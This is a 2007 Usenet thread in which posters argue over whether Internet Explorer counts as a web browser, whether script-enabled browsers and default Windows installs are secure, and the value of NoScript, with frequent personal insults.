am 12.11.2007 09:09:39 von Sebastian Gottschalk
kurt wismer wrote:
> Sebastian G. wrote:
>> kurt wismer wrote:
>>
>>> and the absurdity continues... apparently internet exploder (what most
>>> people use to browse the web with) doesn't exist in your world,
>>
>> It does, but it isn't a webbrowser and therefore counts as PEBKAC. It's
>> futile to discuss it in any security content since it's well documented
>> to not be supposed to provide security in a hostile environment.
>
> i see...
>
> well, all i can say is that those things you disagree with regarding
> drive-by downloading apply to the world where IE *is* a web browser -
Will you please shut up and read the documentation and/or look at the
implementation? The security model is to provide confluent protection in a
secure environment, but not in a hostile environment. And surely it doesn't
even get SGML comment parsing right, how should it ever get HTML right?
So once again: Being commonly abused as a webbrowser still doesn't make it
one. Telnet isn't a webbrowser either.
And despite your ranting, discussing security on IE is pointless, since in
your scenario it's insecure by design.
Re: Jetico Personal Firewall freeware asks way to many questions
am 12.11.2007 18:00:08 von Thomas Ludwig
On Mon, 12 Nov 2007 09:09:39 +0100 Sebastian G. wrote:
> kurt wismer wrote:
>
>> Sebastian G. wrote:
>>> kurt wismer wrote:
>>>
>>>> and the absurdity continues... apparently internet exploder (what most
>>>> people use to browse the web with) doesn't exist in your world,
>>>
>
> Will you please shut up and read the documentation and/or look at the
> implementation? The security model is to provide confluent protection in a
> secure environment, but not in a hostile environment. And surely it doesn't
> even get SGML comment parsing right, how should it ever get HTML right?
>
> So once again: Being commonly abused as a webbrowser still doesn't make it
> one. Telnet isn't a webbrowser either.
>
> And despite your ranting, discussing security on IE is pointless, since in
> your scenario it's insecure by design.
Regardless who is "right" in this discussion - one thing is for sure: The
wording in your postings in this newsgroup is simply embarrassing, and it's
more than obvious that you have a complete lack of social competence.
Poor Sebastian - you must have been the most hated child in kindergarten
....
Re: Jetico Personal Firewall freeware asks way to many questions
am 15.11.2007 01:32:25 von kurt wismer
Sebastian G. wrote:
> kurt wismer wrote:
>> Sebastian G. wrote:
>>> kurt wismer wrote:
>>>
>>>> and the absurdity continues... apparently internet exploder (what
>>>> most people use to browse the web with) doesn't exist in your world,
>>>
>>> It does, but it isn't a webbrowser and therefore counts as PEBKAC.
>>> It's futile to discuss it in any security content since it's well
>>> documented to not be supposed to provide security in a hostile
>>> environment.
>>
>> i see...
>>
>> well, all i can say is that those things you disagree with regarding
>> drive-by downloading apply to the world where IE *is* a web browser -
>
> Will you please shut up and read the documentation and/or look at the
> implementation?
my aren't you pleasant...
> The security model is to provide confluent protection in
> a secure environment, but not in a hostile environment. And surely it
> doesn't even get SGML comment parsing right, how should it ever get HTML
> right?
you make an excellent argument for why it's a *bad* browser, but not for
why it isn't a browser at all...
in the world most people operate in IE is a browser... i can appreciate
trying to redefine things in order to promote a paradigm shift in the
way people think about security - unfortunately it sucks for everyday
practical matters when that paradigm shift hasn't happened yet, and that
paradigm shift isn't likely to come as your behaviour doesn't encourage
people to buy into the alternative view you're proposing...
--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"
Re: Jetico Personal Firewall freeware asks way to many questions
am 15.11.2007 21:27:33 von Sebastian Gottschalk
kurt wismer wrote:
>> And surely it doesn't even get SGML comment parsing right,
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> how should it ever get HTML right?
>
> you make an excellent argument for why it's a *bad* browser, but not for
> why it isn't a browser at all...
First off, we're talking about *web*browsers.
I think it is a very strong argument against being a webbrowser. A broken
SGML parser/lexer, as the absolutely simplest part of rendering a website,
doesn't allow for getting it right at the higher layers. Thus it's
fundamentally unsuitable.
> in the world most people operate in IE is a browser...
Yes, a file browser. Not a webbrowser.
> i can appreciate trying to redefine things
No, that's what you're trying to do. You're claiming that because a lot of
people abuse the non-webbrowser IE as a webbrowser, it would actually become
one. That's silly.
Re: Jetico Personal Firewall freeware asks way to many questions
am 17.11.2007 07:00:57 von Troglodyte
Sebastian G. wrote:
> Seems like a sarcastic expression of doubt, but of course it's a myth.
> There's no general way that just by visiting a website malware could be
> installed. What's needed that this actually works is a vulnerable
> webbrowser or something that is abused as such, and the trivial solution
> to this problem is not using a vulnerable webbrowser, thus it's anything
> but unavoidable.
> Instead of now throwing away their broken webbrowser or stop abusing a
> non-webbrowser as such those fools instead created a buzzword to blame
> their own incompetence on, and this buzzword is "drive-by-downloads".
Name one web browser that uses scripts that is not vulnerable. The only
one I know is firefox with the noscript add-on. That allows me to only
allow websites that I trust to run scripts. But then I've seen you in
here saying firefox is crap too so what browser do you use that is not
vulnerable? And don't tell me Lynx, I said one that allows scripts to run.
Re: Jetico Personal Firewall freeware asks way to many questions
am 17.11.2007 07:08:51 von Troglodyte
Sebastian G. wrote:
> Or correct. Just take a look at the major players Mozilla Firefox,
> Mozilla Seamonkey, Opera, Konqueror and w3m. Agreed, Mozilla Firefox is
> a bit obscure, but nevertheless still secure by default.
No it isn't. Firefox allows scripts to run by default. Any browser that
allows scripts is not secure against malicious scripts. Only by using
noscript add-on does it become secure.
Re: Jetico Personal Firewall freeware asks way to many questions
am 17.11.2007 07:17:50 von Troglodyte
Sebastian G. wrote:
> As you say: it's a band-aid. Nothing more. Security starts with
> addressing the causing, not cascading the symptoms. Especially since the
> main problem, lacking user education, is even further amplified.
Well, seeing as you are certain you know how to make a system secure
without having to use anti virus scanners, spyware scanners, hosts file,
script blockers, ad blockers etc. why don't you put up a website with
instructions on how to do it and provide a real service to the community?
Re: Jetico Personal Firewall freeware asks way to many questions
am 17.11.2007 07:21:57 von Troglodyte
Sebastian G. wrote:
> Depends on which systems. Those with higher security margins have a
> global no-exec policy implemented, thus they simply can't anything but
> the preinstalled software, and as long as this is up-to-date an
> in-memory process compromise of the network is extremely unlikely.
And this is what you propose the average user does? Home users use their
computers for fun and not to pretend their computer is Fort Knox. Hello?
Earth to Sebastian G. You are out of touch with reality. You sure you are
not posting from within the local loony bin?
Re: Jetico Personal Firewall freeware asks way to many questions
am 17.11.2007 07:46:49 von Troglodyte
Straight Talk wrote:
> Please name one that will infect a patched web browser of reasonable
> quality just like that.
Browsers don't get patched until after the exploit has infected
thousands of users' PCs. That's how it works, or haven't you noticed?
http://www.swatit.org/bots/
The measures that Sebastian proposes to secure a home computer are just
unrealistic and he is out to lunch. Maybe you too.
Re: Jetico Personal Firewall freeware asks way to many questions
am 17.11.2007 08:35:30 von unknown
Post removed (X-No-Archive: yes)
Re: Jetico Personal Firewall freeware asks way to many questions
am 17.11.2007 12:50:13 von Sebastian Gottschalk
Troglodyte wrote:
> Sebastian G. wrote:
>
>> As you say: it's a band-aid. Nothing more. Security starts with
>> addressing the causing, not cascading the symptoms. Especially since the
>> main problem, lacking user education, is even further amplified.
>
> Well, seeing as you are certain you know how to make a system secure
> without having to use anti virus scanners, spyware scanners, hosts file,
> script blockers, ad blockers etc. why don't you put up a website with
> instructions on how to do it and provide a real service to the community?
Because, with respect to the demands of a normal home user, Windows is
secure out of the box? And since anti virus scanners, spyware scanners,
hosts file, script blockers, ad blockers etc. can't make a system secure,
there's nothing to discuss at all.
Re: Jetico Personal Firewall freeware asks way to many questions
am 17.11.2007 12:53:58 von Sebastian Gottschalk
Troglodyte wrote:
> Name one web browser that uses scripts that is not vulnerable.
Mozilla/Firefox, Opera, Konqueror, w3m, ...
> The only one I know is firefox with the noscript add-on. That allows me to
> only allow websites that I trust to run scripts.
Well, if you want that, you wouldn't need NoScript either, since Firefox
already has this capability (just doesn't expose it in the GUI). At any
rate, the real benefit of NoScript is to potentially limit XSS when actually
globally allowing scripts.
> But then I've seen you in here saying firefox is crap too so what browser
> do you use that is not vulnerable?
Mozilla Seamonkey
Re: Jetico Personal Firewall freeware asks way to many questions
am 17.11.2007 12:57:41 von Sebastian Gottschalk
Troglodyte wrote:
> Sebastian G. wrote:
>
>> Or correct. Just take a look at the major players Mozilla Firefox,
>> Mozilla Seamonkey, Opera, Konqueror and w3m. Agreed, Mozilla Firefox is
>> a bit obscure, but nevertheless still secure by default.
>
> No it isn't. Firefox allows scripts to run by default.
So you're equating scripts with vulnerabilities? What a nonsense.
> Any browser that allows scripts is not secure against malicious scripts.
Bullshit. Without a vulnerability in the script engine itself JavaScript is
perfectly secure. And such vulnerabilities are so rare, and even further
some serious vendors like Mozilla and the KDE Team have an excellent
vulnerability patching policy.
> Only by using noscript add-on does it become secure.
It might be a really good thing if you inform yourself a bit about
ECMAScript/JavaScript.
Re: Jetico Personal Firewall freeware asks way to many questions
am 17.11.2007 13:00:30 von Sebastian Gottschalk
Troglodyte wrote:
> Sebastian G. wrote:
>
>> Depends on which systems. Those with higher security margins have a
>> global no-exec policy implemented, thus they simply can't anything but
>> the preinstalled software, and as long as this is up-to-date an
>> in-memory process compromise of the network is extremely unlikely.
>
> And this is what you propose the average user does?
Nothing? So far a recent Windows installation is secure out-of-the-box.
As an additional recommendation, a global no-exec policy is actually very
feasible, since the demands of users typically only change rarely.
Re: Jetico Personal Firewall freeware asks way to many questions
am 17.11.2007 13:05:48 von Sebastian Gottschalk
Troglodyte wrote:
> Straight Talk wrote:
>
>> Please name one that will infect a patched web browser of reasonable
>> quality just like that.
>
> Browsers don't get patched until after the exploit has infected
> thousands of users' PCs.
Wrong. Browsers typically get patched before a full description of the
vulnerability is released. Even for the extremely rare cases where that
didn't hold typically a workaround existed, and even further a simple
proactive configuration could have already addressed the problem.
> http://www.swatit.org/bots/
| or adverts for web sites with infectious downloads or even infectious HTML
| using the Active-X exploit for Microsoft Internet Explorer
That's MSIE, not a webbrowser. Of course when you're abusing MSIE as such,
compromise is inherent - as documented and expected.
Re: Jetico Personal Firewall freeware asks way to many questions
am 18.11.2007 21:08:20 von kurt wismer
Sebastian G. wrote:
> kurt wismer wrote:
>
>>> And surely it doesn't even get SGML comment parsing right,
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >> how should it ever get HTML right?
>
>>
>> you make an excellent argument for why it's a *bad* browser, but not
>> for why it isn't a browser at all...
>
>
> First off, we're talking about *web*browsers.
never said otherwise...
> I think it is a very strong argument against being a webbrowser. A
> broken SGML parser/lexer, as the absolutely simplest part of rendering a
> website, doesn't allow for getting it right at the higher layers. Thus
> it's fundamentally unsuitable.
just because it's unsuitable as a web browser doesn't mean it isn't
one... just because its implementation of this or that is broken
doesn't mean it isn't a web browser...
it was designed to allow people to browse the web, it was marketed as a
tool to allow people to browse the web, and it actually *does* allow
people to browse the web... whether it does a good job or is well
implemented doesn't change the fact that it's a web browser, it only
affects its *quality* as a web browser...
>> in the world most people operate in IE is a browser...
>
>
> Yes, a file browser. Not a webbrowser.
sorry, no... ie was born out of the mosaic web browser technology
microsoft purchased/licensed in order to compete with netscape - it is
most definitely a *web* browser...
windows explorer is a file browser, and while ie can *also* browse a
file system, that doesn't change the fact that it is a web browser...
>> i can appreciate trying to redefine things
>
>
> No, that's what you're trying to do. You're claiming that because a lot
> of people abuse the non-webbrowser IE as a webbrowser, it would actually
> become one. That's silly.
now you're putting words in my mouth - i never said the fact that people
use it as a web browser was the reason it was a web browser... what i
have implied, however, is that given the vast majority recognizes it as
a web browser, your *reality* represents a redefinition of things...
--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"
Re: Jetico Personal Firewall freeware asks way to many questions
am 20.11.2007 09:46:31 von fleet
Sebastian G. wrote:
> Wrong. Browsers typically get patched before a full description of the
> vulnerability is released.
BS
Re: Jetico Personal Firewall freeware asks way to many questions
am 20.11.2007 09:49:57 von fleet
Sebastian G. wrote:
> It might be a really good thing if you inform yourself a bit about
> ECMAScript/JavaScript.
Might be a really good thing if you educate yourself on why scripts can
be a very bad thing. Lots of malicious websites out there, boyo.
http://noscript.net/
Re: Jetico Personal Firewall freeware asks way to many questions
on 20.11.2007 09:54:00 by fleet
Sebastian G. wrote:
> Well, if you want that, you wouldn't need NoScript either, since Firefox
> already has this capability (just doesn't expose it in the GUI).
IE can do that too but that's not the same as an add-on that allows one
to allow scripts to run at urls they trust and not any others. Allowing
scripts globally is just asking for trouble.
Re: Jetico Personal Firewall freeware asks way to many questions
on 20.11.2007 09:55:23 by fleet
Sebastian G. wrote:
> Because, with respect to the demands of a normal home user, Windows is
> secure out of the box?
Hahaha...thanks for the laugh. Now pull the other leg.
Re: Jetico Personal Firewall freeware asks way to many questions
on 20.11.2007 09:58:33 by fleet
Sebastian G. wrote:
> Nothing? So far a recent Windows installation is secure out-of-the-box.
Come, come, even noobs know that is not true.
> As an additional recommendation, a global no-exec policy is actually
> very feasible, since the demands of users typically only change rarely.
Well, that wouldn't work for me or most other people I know as we are
always installing new software and games etc.
Re: Jetico Personal Firewall freeware asks way to many questions
on 20.11.2007 12:53:23 by fleet
Sebastian G. wrote:
> Mozilla Seamonkey
What makes Seamonkey a safer browser than Firefox? I don't want a
browser that is an all-in-one app anyway.
http://www.seamonkey-project.org/
> Under the hood, SeaMonkey uses much of the same Mozilla source code which powers such successful siblings as Firefox, Thunderbird, Camino, Sunbird and Miro. Legal backing is provided by the Mozilla Foundation.
Re: Jetico Personal Firewall freeware asks way to many questions
on 21.11.2007 20:32:13 by Sebastian Gottschalk
John Adams wrote:
>> Mozilla Seamonkey
>
> What makes Seamonkey a safer browser than Firefox?
Competent programmers who actually care for the users?
> I don't want a browser that is an all-in-one app anyway.
And the funny thing is that it's still less bloated than Firefox.
Re: Jetico Personal Firewall freeware asks way to many questions
on 21.11.2007 21:17:33 by Dustin Cook
"Sebastian G." wrote in news:5qjfduFvlpftU1@mid.dfncis.de:
> John Adams wrote:
>
>
>>> Mozilla Seamonkey
>>
>> What makes Seamonkey a safer browser than Firefox?
>
>
> Competent programmers who actually care for the users?
Do you intend to address my questions directed to you sir? Or continue to
ignore them?
It's painfully obvious you don't know wtf you're talking about here and
haven't for some time, but I think I've been more than fair with you.
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
on 22.11.2007 17:53:27 by Sebastian Gottschalk
Dustin Cook wrote:
> "Sebastian G." wrote in news:5qjfduFvlpftU1@mid.dfncis.de:
>
>> John Adams wrote:
>>
>>
>>>> Mozilla Seamonkey
>>> What makes Seamonkey a safer browser than Firefox?
>>
>> Competent programmers who actually care for the users?
>
> Do you intend to address my questions directed to you sir? Or continue to
> ignore them?
If you want a detailed analysis of the differences you'd need to carefully
study the architecture of the mentioned programs, as well as the
configuration of the particular components.
One classical example: Mozilla Firefox doesn't expose the SSL configuration
options and has all weak cipher/hash options allowed by default.
Re: Jetico Personal Firewall freeware asks way to many questions
on 24.11.2007 15:27:47 by Dustin Cook
"Sebastian G." wrote in
news:5qlqgoF10b33tU1@mid.dfncis.de:
> Dustin Cook wrote:
>
>> "Sebastian G." wrote in news:5qjfduFvlpftU1@mid.dfncis.de:
>>
>>> John Adams wrote:
>>>
>>>
>>>>> Mozilla Seamonkey
>>>> What makes Seamonkey a safer browser than Firefox?
>>>
>>> Competent programmers who actually care for the users?
>>
>> Do you intend to address my questions directed to you sir? Or
>> continue to ignore them?
>
>
> If you want a detailed analysis of the differences you'd need to
> carefully study the architecture of the mentioned programs, as well as
> the configuration of the particular components.
>
> One classical example: Mozilla Firefox doesn't expose the SSL
> configuration options and has all weak cipher/hash options allowed by
> default.
>
I wasn't talking about Firefox. I was talking about your comments related
to BugHunter, specifically.
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt